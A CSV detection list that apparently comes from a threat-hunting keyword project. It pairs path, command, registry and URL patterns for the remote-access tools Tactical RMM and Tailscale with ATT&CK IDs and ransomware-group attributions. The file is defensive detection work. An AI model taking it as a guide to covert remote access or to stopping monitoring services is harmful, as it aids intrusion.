"*\rmm-client-site-server.exe*",".{0,1000}\\rmm\-client\-site\-server\.exe.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","0","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z"
"*\rmm-installer.ps1*",".{0,1000}\\rmm\-installer\.ps1.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","0","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z"
"*\tacticalagent-v*-linux-arm.exe*",".{0,1000}\\tacticalagent\-v.{0,1000}\-linux\-arm\.exe.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","0","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z"
"*\tacticalagent-v*-windows-amd64.exe*",".{0,1000}\\tacticalagent\-v.{0,1000}\-windows\-amd64\.exe.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","0","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z"
"*\tacticalrmm.exe*",".{0,1000}\\tacticalrmm\.exe.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","0","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z"
"*\tacticalrmm\*",".{0,1000}\\tacticalrmm\\.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","0","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z"
"*amidaware/tacticalrmm*",".{0,1000}amidaware\/tacticalrmm.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","1","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z"
"*https://*.tacticalrmm.com/*",".{0,1000}https\:\/\/.{0,1000}\.tacticalrmm\.com\/.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","1","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z"
"*net stop tacticalrmm*",".{0,1000}net\sstop\stacticalrmm.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","0","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z"
"*RMM.WebRemote.exe*",".{0,1000}RMM\.WebRemote\.exe.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","1","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z"
"*SOFTWARE\TacticalRMM*",".{0,1000}SOFTWARE\\TacticalRMM.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","0","N/A","registry","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z"
"*su - tactical*",".{0,1000}su\s\-\stactical.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","0","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z"
"*sudo -s /bin/bash tactical*",".{0,1000}sudo\s\-s\s\/bin\/bash\stactical.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","0","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z"
"*systemctl * rmm.service*",".{0,1000}systemctl\s.{0,1000}\srmm\.service.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","0","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z"
"*Tactical RMM Agent*",".{0,1000}Tactical\sRMM\sAgent.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","0","N/A","registry","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z"
"*tacticalrmm.utils*",".{0,1000}tacticalrmm\.utils.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","0","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z"
"*tacticalrmm-develop*",".{0,1000}tacticalrmm\-develop.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","1","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z"
"* install tailscale*",".{0,1000}\sinstall\stailscale.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"* net-vpn/tailscale*",".{0,1000}\snet\-vpn\/tailscale.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"* tailscale.exe*",".{0,1000}\stailscale\.exe.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"* tailscale-archive-keyring*",".{0,1000}\stailscale\-archive\-keyring.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*.tailscale-keyring.list*",".{0,1000}\.tailscale\-keyring\.list.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*/cmd/tailscaled*",".{0,1000}\/cmd\/tailscaled.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*/sources.list.d/tailscale.list*",".{0,1000}\/sources\.list\.d\/tailscale\.list.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*/tailscale update*",".{0,1000}\/tailscale\supdate.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*/tailscale.exe*",".{0,1000}\/tailscale\.exe.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*/tailscale/cli/*",".{0,1000}\/tailscale\/cli\/.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*/tailscale/client/*",".{0,1000}\/tailscale\/client\/.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*/tailscale/clientupdate/*.go*",".{0,1000}\/tailscale\/clientupdate\/.{0,1000}\.go.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*/tailscale:unstable*",".{0,1000}\/tailscale\:unstable.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*/tailscale_*_*.deb*",".{0,1000}\/tailscale_.{0,1000}_.{0,1000}\.deb.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*/tailscale_*_*.tgz*",".{0,1000}\/tailscale_.{0,1000}_.{0,1000}\.tgz.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*/tailscaled.defaults*",".{0,1000}\/tailscaled\.defaults.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*/tailscaled.go*",".{0,1000}\/tailscaled\.go.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*/tailscaled.sock*",".{0,1000}\/tailscaled\.sock.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*/tailscale-setup-*-*.msi*",".{0,1000}\/tailscale\-setup\-.{0,1000}\-.{0,1000}\.msi.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*/tailscale-setup-*.exe*",".{0,1000}\/tailscale\-setup\-.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*/test_tailscale.sh*",".{0,1000}\/test_tailscale\.sh.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*\\.\pipe\tailscale-test*",".{0,1000}\\\\\.\\pipe\\tailscale\-test.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","#namedpipe","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*\cmd\tailscaled*",".{0,1000}\\cmd\\tailscaled.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*\tailscale.exe*",".{0,1000}\\tailscale\.exe.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*\tailscale\cli\*",".{0,1000}\\tailscale\\cli\\.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*\tailscale\client\*",".{0,1000}\\tailscale\\client\\.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*\tailscale\clientupdate\*",".{0,1000}\\tailscale\\clientupdate\\.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*\tailscale\cmd\*",".{0,1000}\\tailscale\\cmd\\.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*\tailscale_*_*.deb*",".{0,1000}\\tailscale_.{0,1000}_.{0,1000}\.deb.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*\tailscale_*_*.tgz*",".{0,1000}\\tailscale_.{0,1000}_.{0,1000}\.tgz.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*\tailscaled.go*",".{0,1000}\\tailscaled\.go.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*\tailscale-setup-*.exe*",".{0,1000}\\tailscale\-setup\-.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*\test_tailscale.sh*",".{0,1000}\\test_tailscale\.sh.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*<h1>Hello from Tailscale</h1>*",".{0,1000}\<h1\>Hello\sfrom\sTailscale\<\/h1\>.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*apk add tailscale*",".{0,1000}apk\sadd\stailscale.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*cmd/tailscale*",".{0,1000}cmd\/tailscale.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*connected via tailscaled*",".{0,1000}connected\svia\stailscaled.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*EnableTailscaleDNSSettings*",".{0,1000}EnableTailscaleDNSSettings.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*EnableTailscaleSubnets*",".{0,1000}EnableTailscaleSubnets.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*github.com/tailscale*",".{0,1000}github\.com\/tailscale.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*http://127.0.0.1:4000*",".{0,1000}http\:\/\/127\.0\.0\.1\:4000.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*http://local-tailscaled.sock*",".{0,1000}http\:\/\/local\-tailscaled\.sock.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*https://api.tailscale.com/api/v2/*",".{0,1000}https\:\/\/api\.tailscale\.com\/api\/v2\/.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*https://apps.apple.com/us/app/tailscale/id*",".{0,1000}https\:\/\/apps\.apple\.com\/us\/app\/tailscale\/id.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*https://login.tailscale.com/admin/settings/keys*",".{0,1000}https\:\/\/login\.tailscale\.com\/admin\/settings\/keys.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*https://tailscale.com/s/resolvconf-overwrite*",".{0,1000}https\:\/\/tailscale\.com\/s\/resolvconf\-overwrite.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*install -y tailscale*",".{0,1000}install\s\-y\stailscale.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*linuxfw.TailscaleSubnetRouteMark*",".{0,1000}linuxfw\.TailscaleSubnetRouteMark.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*local-tailscaled.sock*",".{0,1000}local\-tailscaled\.sock.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*login.tailscale.com*",".{0,1000}login\.tailscale\.com.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*pacman -S tailscale*",".{0,1000}pacman\s\-S\stailscale.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*pkgctl-Tailscale.service*",".{0,1000}pkgctl\-Tailscale\.service.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*pkgs.tailscale.com/*/*",".{0,1000}pkgs\.tailscale\.com\/.{0,1000}\/.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
